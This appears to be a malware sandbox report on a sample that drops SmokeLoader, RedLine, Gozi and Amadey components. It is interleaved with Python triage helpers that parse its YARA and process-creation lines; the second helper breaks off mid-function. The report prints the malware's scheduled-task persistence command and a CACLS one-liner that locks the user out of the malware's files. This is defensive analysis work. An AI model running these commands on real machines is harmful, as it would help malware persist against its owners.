Source: 0000000D.00000002.419975883.0000000000A61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.326943587.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000F.00000002.538954387.0000000000A91000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002E.00000000.457780298.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000F.00000002.529416121.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.540373176.00000000007D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.327031304.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED Matched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED Matched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
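The YARA hits above are easier to read once they are grouped by process and memory region. The following Python triage helper is an added example, not part of the Joe Sandbox report or of any vendor tooling: it parses lines in the "Source: ..., type: ... Matched rule: ..." shape, maps rule names to the families the report already attributes (SmokeLoader, RedLine, Ursnif/Gozi, Amadey; "Amady" is the spelling used by the INDICATOR_TOOL_PWS_Amady rule itself), and pulls the process index, base address and page protection out of the memory-dump file names. The reading of the dump name as process-index.phase.counter.base-address.protection is an assumption drawn from the naming in this report (0xC matches the 12_2_ prefix of the 2B4A.exe code functions); 0x40 is the Windows PAGE_EXECUTE_READWRITE constant, and the remaining fields are left uninterpreted. The sample input is copied from the report with the trailing rule metadata trimmed.

```python
import re
from collections import defaultdict

# Constructed sample: match lines copied from the report above, rule metadata trimmed.
SAMPLE = r"""
Source: 0000000B.00000002.378510967.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7
Source: 0000000B.00000002.378663629.0000000000B41000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c
Source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen
Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237
Source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED Matched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
"""

MATCH_RE = re.compile(r"^Source: (?P<source>.+?), type: (?P<kind>\w+) Matched rule: (?P<rule>\S+)")
# Assumed layout of a memory dump name: index.phase.counter.base.protection.<uninterpreted>.sdmp
DUMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.\d+\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\."
)
# Unpacked PE names start with the decimal process index and phase, e.g. 12.2.2B4A.exe...
UNPACK_RE = re.compile(r"^(?P<pid>\d+)\.(?P<phase>\d+)\.")

PAGE_EXECUTE_READWRITE = 0x40  # Windows page protection constant

# Family labels used in this report, keyed by a substring of the rule name.
FAMILIES = (("SmokeLoader", "smokeloader"), ("RedLine", "redline"),
            ("Ursnif/Gozi", "gozi"), ("Amadey", "amady"))


def classify_rule(rule):
    """Map a YARA rule name to the malware family the report attributes it to."""
    low = rule.lower()
    for family, needle in FAMILIES:
        if needle in low:
            return family
    return "unknown"


def parse_match_line(line):
    """Return a record for one match line, or None if the line is not a match."""
    m = MATCH_RE.match(line.strip())
    if not m:
        return None
    rec = {"source": m["source"], "kind": m["kind"], "rule": m["rule"],
           "family": classify_rule(m["rule"]), "pid": None, "base": None, "protect": None}
    if rec["kind"] == "MEMORY":
        d = DUMP_RE.match(rec["source"])
        if d:
            rec["pid"] = int(d["pid"], 16)
            rec["base"] = int(d["base"], 16)
            rec["protect"] = int(d["prot"], 16)
    elif rec["kind"] == "UNPACKEDPE":
        u = UNPACK_RE.match(rec["source"])
        if u:
            rec["pid"] = int(u["pid"])
    return rec


def summarize(text):
    """Group families per process index, list RWX regions that matched, list dropped files."""
    per_process = defaultdict(set)
    rwx_regions = []
    dropped = []
    for line in text.splitlines():
        rec = parse_match_line(line)
        if rec is None:
            continue
        if rec["pid"] is not None:
            per_process[rec["pid"]].add(rec["family"])
        if rec["protect"] is not None and rec["protect"] & PAGE_EXECUTE_READWRITE:
            rwx_regions.append((rec["pid"], rec["base"], rec["family"]))
        if rec["kind"] == "DROPPED":
            dropped.append((rec["source"], rec["family"]))
    return {"per_process": dict(per_process), "rwx_regions": rwx_regions, "dropped": dropped}


if __name__ == "__main__":
    s = summarize(SAMPLE)
    for pid, fams in sorted(s["per_process"].items()):
        print(f"process {pid}: {', '.join(sorted(fams))}")
    for pid, base, fam in s["rwx_regions"]:
        print(f"RWX region 0x{base:X} in process {pid} matched {fam}")
```

Run over the full match list, this separates the injected SmokeLoader payload regions (RWX private memory in several processes) from the RedLine hits at the 0x400000 image base of 2B4A.exe, which is where the overwritten PE header noted in the signatures lives.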
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_00401386 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401386
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040145D
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_00401469 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401469
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040148C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040148C
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00401386 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401386
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_0040145D
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00401469 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401469
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040148C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_0040148C
Source: 86EE.exe.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 8C00.exe.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 2B4A.exe.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 453D.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: S2XJ2wbz7u.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\tiddsjj
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@67/30@58/22
Source: C:\Users\user\AppData\Local\Temp\3790.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\S2XJ2wbz7u.exe C:\Users\user\Desktop\S2XJ2wbz7u.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\tiddsjj C:\Users\user\AppData\Roaming\tiddsjj
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2B4A.exe C:\Users\user\AppData\Local\Temp\2B4A.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3790.exe C:\Users\user\AppData\Local\Temp\3790.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\453D.exe C:\Users\user\AppData\Local\Temp\453D.exe
Source: C:\Users\user\AppData\Local\Temp\3790.exe Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\59FE.exe C:\Users\user\AppData\Local\Temp\59FE.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6644.exe C:\Users\user\AppData\Local\Temp\6644.exe
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6CEC.exe C:\Users\user\AppData\Local\Temp\6CEC.exe
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\816F.exe C:\Users\user\AppData\Local\Temp\816F.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2B4A.exe C:\Users\user\AppData\Local\Temp\2B4A.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3790.exe C:\Users\user\AppData\Local\Temp\3790.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\453D.exe C:\Users\user\AppData\Local\Temp\453D.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\59FE.exe C:\Users\user\AppData\Local\Temp\59FE.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6644.exe C:\Users\user\AppData\Local\Temp\6644.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6CEC.exe C:\Users\user\AppData\Local\Temp\6CEC.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\816F.exe C:\Users\user\AppData\Local\Temp\816F.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\3790.exe Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe Process created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Users\user\AppData\Local\Temp\8C00.exe Process created: unknown unknown
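The process-creation lines above record the persistence chain a responder should pull out of this report: the injected explorer.exe launches the four-hex-character droppers from the user's Temp directory, 3790.exe (whose PDB path names it as Amadey) copies itself to Temp\99e342142d\rovwer.exe, rovwer.exe registers a scheduled task that relaunches it every minute, and a cmd.exe one-liner uses CACLS to deny the user access to the file and its directory (user:N) before granting read-only access back (user:R /E), so the user can no longer delete or modify them. The Python below is an added example, not part of the report or of the sandbox's tooling: it parses these lines, tokenises the command lines, and flags four behaviours that the report documents: a scheduled task whose /TR target lives under the user profile, a CACLS deny entry, explorer.exe spawning a binary from a user-writable path, and a process spawning its own image name (86EE.exe and 8C00.exe restarting themselves, and explorer.exe creating another explorer.exe). The sample input is copied from the report; the "user-writable" heuristic is a simplification of the real check.

```python
import re

# Constructed sample: process-creation lines copied from the report above.
SAMPLE = r"""
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2B4A.exe C:\Users\user\AppData\Local\Temp\2B4A.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3790.exe C:\Users\user\AppData\Local\Temp\3790.exe
Source: C:\Users\user\AppData\Local\Temp\3790.exe Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Process created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: unknown unknown
"""

EVENT_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<image>\S+)(?: (?P<cmdline>.*))?$")
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')  # quoted tokens keep their spaces, quotes are stripped


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def user_writable(path):
    """Heuristic (assumption): a path under the Users profile tree and outside the Windows tree."""
    p = path.lower()
    return "\\users\\" in p and "\\windows\\" not in p


def flag_value(argv, flag):
    """Token following a case-insensitive switch such as /TR, or None if absent."""
    low = [a.lower() for a in argv]
    if flag in low and low.index(flag) + 1 < len(argv):
        return argv[low.index(flag) + 1]
    return None


def parse_event(line):
    """Parse one 'Process created' line into parent, image and tokenised command line."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    argv = [quoted or bare for quoted, bare in TOKEN_RE.findall(m["cmdline"] or "")]
    return {"parent": m["parent"], "image": m["image"], "argv": argv}


def analyze(text):
    """Return a list of findings, each a dict with kind, target and parent."""
    findings = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
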